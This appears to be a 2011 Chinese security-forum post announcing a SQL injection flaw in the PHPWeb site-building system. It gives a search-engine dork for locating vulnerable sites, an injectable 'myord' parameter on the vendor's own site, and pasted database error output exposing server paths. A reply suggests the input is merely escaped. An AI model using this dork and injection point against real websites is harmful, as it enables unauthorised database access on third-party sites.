Board logo

标题: PHPWeb企业智能建站系统注入漏洞 [打印本页]

作者: 匿名    时间: 2011-3-22 20:39     标题: PHPWeb企业智能建站系统注入漏洞

inurl:down/class/index.php?myord=1 EXp:http://www.phpweb.net/down/class/index.php?myord=1 直接放到工具里就能跑 官网信息 Database error: Invalid SQL: select * from pw_down_con where iffb='1' and catid!='0' order by 1\' desc limit 0,30 MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' desc limit 0,30' at line 1) #0 DBbase_Sql->halt(Invalid SQL: select * from pw_down_con where iffb='1' and catid!='0' order by 1\' desc limit 0,30) called at [E:\wwwroot\phpweb.net\includes\db.inc.php:54] #1 DBbase_Sql->query(select * from {P}_down_con where iffb='1' and catid!='0' order by 1\' desc limit 0,30) called at [E:\wwwroot\phpweb.net\down\module\DownQuery.php:105] #2 DownQuery() called at [E:\wwwroot\phpweb.net\includes\common.inc.php:551] #3 PrintPage() called at [E:\wwwroot\phpweb.net\down\class\index.php:11] Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\wwwroot\phpweb.net\includes\db.inc.php on line 61
作者: dreink    时间: 2011-3-24 22:40

唉!只是被转义了!




欢迎光临 【3.A.S.T】网络安全爱好者 (http://www.3ast.com/) Powered by Discuz! 7.2